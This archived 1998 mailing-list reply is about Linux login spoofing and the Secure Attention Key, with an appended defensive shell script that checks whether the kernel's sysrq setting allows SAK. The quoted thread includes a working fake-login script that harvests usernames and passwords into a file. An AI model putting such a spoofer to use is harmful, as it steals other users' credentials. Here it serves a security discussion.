[OFFTOPIC] Re: Linux login security approaches

Pavel Machek (pavel@bug.ucw.cz)
Fri, 11 Dec 1998 10:10:54 +0100


HI!

> > You have a fundamental flaw in your assumptions, since you don't take into
> > account the fact that unless the security of the system is very badly
> > messed up already, if a user is able to substitute his own program for
> > the normal login/getty, he can also exchange his programs for whatever
> > else you add to give better "security".
>
> What about just starting (as evil_user, who has an account) the following,
> hiding behind a corner, and waiting for another user?
>
> #!/bin/sh
> #
> echo -n "`uname -n` login: "
> read LOGIN
> echo -n "Password: "
> read PW
> echo $LOGIN $PW >> ~/sneaked_passwords.txt
> chmod 0600 ~/sneaked_passwords.txt
> echo "Login incorrect"
> sleep 1
> logout

> (of course, this has to be a text terminal)

Press SAK and be done.

> > <asbestos>
> > The reason why people said your suggestion was the "NT way", is that it
> > makes life harder to everyone trying to use the system, without adding to
> > the actual security of the system.
> > </asbestos>
>
> the most secure way of logging in I have seen so far is the following (I
> helped set it up, kind of, in a firm I jobbed during holidays).
>
> Everyone has a pager or a manager tamagotchi (mobile phone). Logging in
> makes /bin/login send a random string (like from 'pwgen') as e-mail to an
> email<->SMS gateway. A couple of seconds later this string pops up on their
> pagers, they enter it. THEN they enter their own (private)
> password.

Ok, so my fake login has to send them email. You _still_ have to press SAK.

> Of course, you will have to have your pager with you, but you get used to
> that. One big advantage is that you will always be warned at once if someone
> tries to log into your account, better yet _from where_ if the terminal id
> is included in this one time SMS password.

Pavel

-- 
I'm really pavel@atrey.karlin.mff.cuni.cz. 	   Pavel
Look at http://atrey.karlin.mff.cuni.cz/~pavel/ ;-).
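Pavel's answer to the fake-login script is SAK, the Secure Attention Key: it kills every process attached to the console, so nothing a local user left running can be sitting there when the real login prompt appears. On current Linux kernels SAK is only reachable if the sysrq bitmask in /proc/sys/kernel/sysrq allows the "keyboard control" group. The following is an added example, not code from the thread, that decodes that bitmask; the function names and the assumption that the bit values match the kernel's sysrq documentation (1 = all, 4 = keyboard control incl. SAK) are mine:

```shell
#!/bin/sh
# Added example: decode the kernel.sysrq bitmask and report whether the
# keyboard-control group (which carries SAK) is allowed. Bit values are
# taken from the kernel's sysrq documentation (assumption for this example).

# sysrq_allows MASK BIT: succeed if MASK enables BIT (1 means everything).
sysrq_allows() {
    mask=$1
    bit=$2
    [ "$mask" -eq 1 ] && return 0
    [ $(( mask & bit )) -ne 0 ]
}

# sak_status MASK: print "enabled" or "disabled" for the SAK group (bit 4).
sak_status() {
    if sysrq_allows "$1" 4; then
        echo enabled
    else
        echo disabled
    fi
}

# sysrq_describe MASK: print one line per enabled capability group.
sysrq_describe() {
    mask=$1
    for pair in 2:loglevel 4:keyboard_sak_unraw 8:debug_dumps 16:sync \
                32:remount_ro 64:signal_processes 128:reboot_poweroff \
                256:nice_rt_tasks; do
        bit=${pair%%:*}
        name=${pair#*:}
        if sysrq_allows "$mask" "$bit"; then
            echo "$name"
        fi
    done
}

# Live check of the running system; the test cases below use constructed
# mask values so the functions can be exercised without /proc.
if [ -r /proc/sys/kernel/sysrq ]; then
    cur=$(cat /proc/sys/kernel/sysrq)
    echo "kernel.sysrq=$cur  SAK: $(sak_status "$cur")"
    sysrq_describe "$cur"
fi
```

A mask such as 176 (reboot, remount, sync), a common distribution default, leaves SAK unavailable even though the magic SysRq key itself still works.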
